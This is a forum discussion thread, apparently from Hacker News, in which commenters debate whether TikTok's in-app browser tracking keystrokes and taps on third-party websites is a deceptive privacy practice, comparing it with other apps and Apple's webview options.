I can’t quite figure this out: it sounds like if you click a link in someone’s TikTok content, the in app browser can read any text entered on that site using the in app browser. Does just not entering any keyboard input in the in app browser mitigate this?
Does Apple Lockdown help in this situation? I thought that typical TikTok use just involved scrolling and watching video content. Are users who only view content subject to this security flaw?
Thanks in advance for any clarification.
Also, off topic but doesn’t YouTube’s “Shorts” take the place of TikTok? I have my Google privacy settings set so YouTube can store my viewing history for one month so I get reasonable recommendations. Does TikTok have similar settings?
If I build an analytics company and build a product that my customers can use to "analyze" their users activity it'd almost be a total neglect on my end not to include common tracking mechanisms that are well documented like simple event hooks in js. I really don't get the rage against tiktok.
What they do that is publicly known is not bad. Maybe there is something bad they're doing but these random HN top stories are not it. If NSA/US govt really wants us to avoid tiktok it needs better convincing than "omg they're stealing the x,y of your finger when you tap on an image."
You're writing as if this is just analytics tracking a user's actions in their own UI. It's not! This is tracking actions users take, and data users enter, on 3rd-party websites.
That is not "what happens in Tiktok's app," as you put it in your reply. It may be hosted "in" the app in a technical sense, but the typical user who is fullscreen viewing a totally different website may not feel like they are "in" the app at all. I wouldn't bet that most users even get that there's a distinction between an in-app browser vs. opening a tab in the main OS browser (on Android at least, the back gesture takes you back to the app either way). Users almost certainly doesn't expect the original app to be able to read passwords and other text that they type on those 3rd-party sites.
And how do we know Instagram and yelp are not doing something similar? If you have in app browser you can track user activity much more invasively. That’s not an argument against tiktok, that’s an argument against in app browsers. If you’re so concerned with user privacy ask Apple to remove that functionality from all apps instead of slyfully picking and choosing the apps to attack.
TikTok is not a browser and has zero obligation to provide private communications. What you do inside TikTok's app is quite literally TikTok's business.
But when you click a link in the TikTok app, TikTok opens an in-app browser for you to view it in - and that’s where it’s gathering all the information. It’s a deceptive practice, since most users won’t realize that they’re not simply surfing a website as usual.
Not only that, but per the article, TikTok is the only popular app that does this while not providing an option to open the link in regular browser from within the built-in one.
Did you just wake up today after reading this article and learned about the existence of in-app browsers? This is a common practice by almost all social media apps.
Unfortunately, the issue of consent is extremely muddy as it's easy to argue that the average person is not informed enough about the issue at hand, and so they have improperly developed expectations when engaging with the TikTok browser.
Lack of consent and lack of transparency, make this whole thing pretty messed up.
What happens in tiktok app is very much tiktok's business and their IP.
Are you possibly conflating tiktok tracking its own users within its app with somehow it gaining access to the OS itself and tracking users at that level? That is clearly not happening as far as what is publicly known as much as stories like this want you to believe for it to be the case.
It makes sense when you’re a slick lawyer appealing to technicalities, but in reality users don’t know how their devices work and where borders of an app are. If tiktok was a restaurant, we would talk about its restroom surveillance here. It may not collect too private information like passwords or messages, but the doubt is reasonable.
Would consider it right for a browser to snoop on every page opened, every link clicked, every character typed and send it to the cloud without informing the user?
No my point is why single out tiktok when every other social app is doing the same exact thing for all we know in their in-app browsers. Just because the researcher in this particular article happened to go after tiktok?
Why not use an example if you know they are doing it, if you don’t have time to lookup what all the others are doing? Its a pretty weak defense that everyone else is doing the same wrong thing.
It's not a defense, I'm simply asking why is everyone pilling on tiktok over some javascript trickery just bc they're deemed an enemy of the state by our all mighty government?
Apple exposes two ways to use an in app browser. One is a legacy method that gives you full control, the other gives the user a sandboxed browser with no interference from the app.
TikTok isn't the only app abusing this. Instagram and Facebook will both do sneaky things like respond to the content of the page you're browsing (asking to save passwords in their own private keychain, showing context specific information, etc.)
-
You're not exposed to any of these if you don't open a link inside the in-app browser.
The most common reason to click a link in their in-app browser is an ad... so obviously TikTok, Instagram and Facebook are using the in-app browser to track your interactions after the ad click and sell the data
People really want to force outrage on this, but after enough interaction with the ad (scrolling, clicking, typing) TikTok asks about your experience with the ad.
TikTok is not pretending to have opened your system browser, it goes very far in doing the opposite:
- Hides the normal browser UI
- Replaces every page load with a TikTok spinner
- Permanently places a TikTok header bar over the screen with a report content button tied to TikTok
Combine that with the fact so many people seem to not realize... the only links you can open with the browser are links sold with analytics (ie you can't post arbitrary links as a user commenting) and the outrage just doesn't add up.
A completely non-technical user going through that flow would expect that they're still in TikTok and are using TikTok not their browser
Apple needs to give us power-users the option to decide whether to load such web contents (in apps) in either SFSafariViewController (sandboxed) or WKWebView (fully exposed). This is especially critical when, for example, payment processors load your net banking portal inside apps (a common mode of online payment in India) - unless it is sandboxed, the app and / or payment processor has complete access to your netbanking credentials.
To play devil's advocate... the most common way to end up in the in-app browser is to click an ad.
Non-technical people don't have a concept of "in app browser sandboxing". In their minds they clicked on an ad, they're still inside TikTok, TikTok's UI is showing, TikTok will show prompts based on the content shown... they probably assume TikTok has access to that page?
Honestly I'm more annoyed that Apple allows big apps to use the loophole that is the legacy webview than I am that TikTok uses that webview to do the exact single thing it's good for... having full control over the web content you're showing in app.
That is completely wrong since most users cannot post a website link (hotlink if I need to spell that out...), let alone in a comment.
The only way for a non-ad link to be opened from comments is to copy it and paste it in your native browser.
Business accounts get a special link field that's part of their bio, so again, deeply embedded in TikTok... and those behave exactly like the ads do. TikTok has a permanent "Flag" UI on top of the site, they replace every page load with a TikTok spinner
As expected half the people outraged don't even know what they're outraged about.
In that guy's other comment he was talking about Meta/Facebook too which is what I'm most familiar with and was primarily referring to about people clicking on links.
Even with TikTok I bet people click on profile links more than ads
Also that's not ironic, maybe you are thinking of another word
The entire thread from the parent is about TikTok.
And "you bet" wrong, since the profile links are only enabled for business accounts.
But you're right about one thing: it was not at all ironic you'd deflect. It's exactly what I'd expect after someone misses what a thread about and makes assumptions about a subject they don't know.
Does Apple Lockdown help in this situation? I thought that typical TikTok use just involved scrolling and watching video content. Are users who only view content subject to this security flaw?
Thanks in advance for any clarification.
Also, off topic but doesn’t YouTube’s “Shorts” take the place of TikTok? I have my Google privacy settings set so YouTube can store my viewing history for one month so I get reasonable recommendations. Does TikTok have similar settings?